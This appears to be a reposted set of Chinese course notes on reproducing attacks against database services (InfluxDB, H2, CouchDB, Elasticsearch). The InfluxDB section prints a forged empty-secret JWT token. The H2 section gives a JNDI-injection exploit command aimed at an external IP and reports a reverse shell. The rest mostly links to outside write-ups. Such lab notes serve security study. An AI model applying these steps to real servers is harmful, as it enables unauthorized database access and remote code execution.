如何判斷數(shù)據(jù)庫:
1.端口掃描
2.報錯回顯
一.Influxdb-未授權(quán)訪問-Jwt 驗證不當(dāng)
1.什么是時序數(shù)據(jù)庫?
時序數(shù)據(jù)庫是近幾年一個新的概念,與傳統(tǒng)的Mysql關(guān)系型數(shù)據(jù)庫相比,它的最大的特點是:數(shù)據(jù)按照時間順序存儲。
舉例來說,日志數(shù)據(jù),是以時間順序存儲的,所以用時序數(shù)據(jù)庫存儲是一種很好的選擇。使用Mysql在存儲的過程中,不是對這種基于時間的數(shù)據(jù)進行優(yōu)化的,所以,在查詢、插入上有一些瓶頸。
默認端口:
Web 操作界面默認運行在 localhost 8083 端口;
HTTP API 接口默認運行在 localhost 8086 端口
參考鏈接:https://blog.csdn.net/weixin_46560589/article/details/126002393
2.未授權(quán)訪問
Influxdb使用 jwt 作為鑒權(quán)方式。在用戶開啟了認證, 但未設(shè)置參數(shù) shared-secret 的情況下,jwt 的認證密鑰為空字符串,此時攻擊者可 以偽造任意用戶身份在 influxdb 中執(zhí)行 SQL 語句。
影響版本:InfluxDB < 1.7.6
訪問http://xxx:8086/debug/vars? ? ? 可查看系統(tǒng)服務(wù)信息
訪問http://xxx:8086/query? ? ? ?
并以POST請求db=sample&q=show users? ? ?會提示需要登錄:
直接登錄會報錯
其中,adnin 是一個已經(jīng)存在的用戶, exp 是一個時間截,代表著這個token的過期時間,你需要設(shè)置為一個未來的時間戳,設(shè)置一個空密匙進行加密。
通過抓包/query?添加數(shù)據(jù)
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiZXhwIjoxNjc2MzQ2MjY3fQ.NPhb55F0tpsp5X5vcN_IkAAGDfNzV5BA6M4AThhxz6A
二.H2 database-未授權(quán)訪問-配置不當(dāng)
默認端口:20051
H2 database 是一款 Java 內(nèi)存數(shù)據(jù)庫,多用于單元測試。H2 database 自帶一個 Web 管理頁面,在 Spirng 開發(fā)中,如果我們設(shè)置如下選項,即可允許外部用戶訪問 Web 管理頁面,且沒有鑒權(quán):
spring.h2.console.enabled=true
spring.h2.console.settings.web-allow-others=true
1.下載EXP:? JNDI-Injection-Exploit——https://github.com/welk1n/JNDI-Injection-Exploit.git
2.執(zhí)行命令: java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C touch /tmp/success -A 49.232.65.159
3.攻擊端開啟監(jiān)聽
4.
javax.naming.InitialContext
5.成功反彈shell
三.CouchDB-權(quán)限繞過配合 RCE-漏洞
感覺用的少
參考下面兩個cve
vulhub/couchdb/CVE-2017-12635/README.zh-cn.md at master · vulhub/vulhub (github.com)
vulhub/couchdb/CVE-2017-12636/README.zh-cn.md 在 master ·vulhub/vulhub (github.com)
四.ElasticSearch-文件寫入&RCE-漏洞
Elasticsearch 是一個分布式、免費和開放的搜索和分析引擎,適用于所有類型的數(shù)據(jù),包括文本、數(shù)字、地理空間、結(jié)構(gòu)化和非結(jié)構(gòu)化數(shù)據(jù)。
迪總說經(jīng)常和Kibana用于藍隊的日志分析和數(shù)據(jù)分析
默認端口:9200? ?9300
直接看下面這個鏈接比較全(偷懶)文章來源:http://www.zghlxwxcb.cn/news/detail-770288.html
ElasticSearch漏洞復(fù)現(xiàn)_elastic漏洞-CSDN博客文章來源地址http://www.zghlxwxcb.cn/news/detail-770288.html
到了這里,關(guān)于小迪安全 第56天 服務(wù)攻防-數(shù)據(jù)庫安全&H2&Elasticsearch&CouchDB&Influxdb 復(fù)現(xiàn)的文章就介紹完了。如果您還想了解更多內(nèi)容,請在右上角搜索TOY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!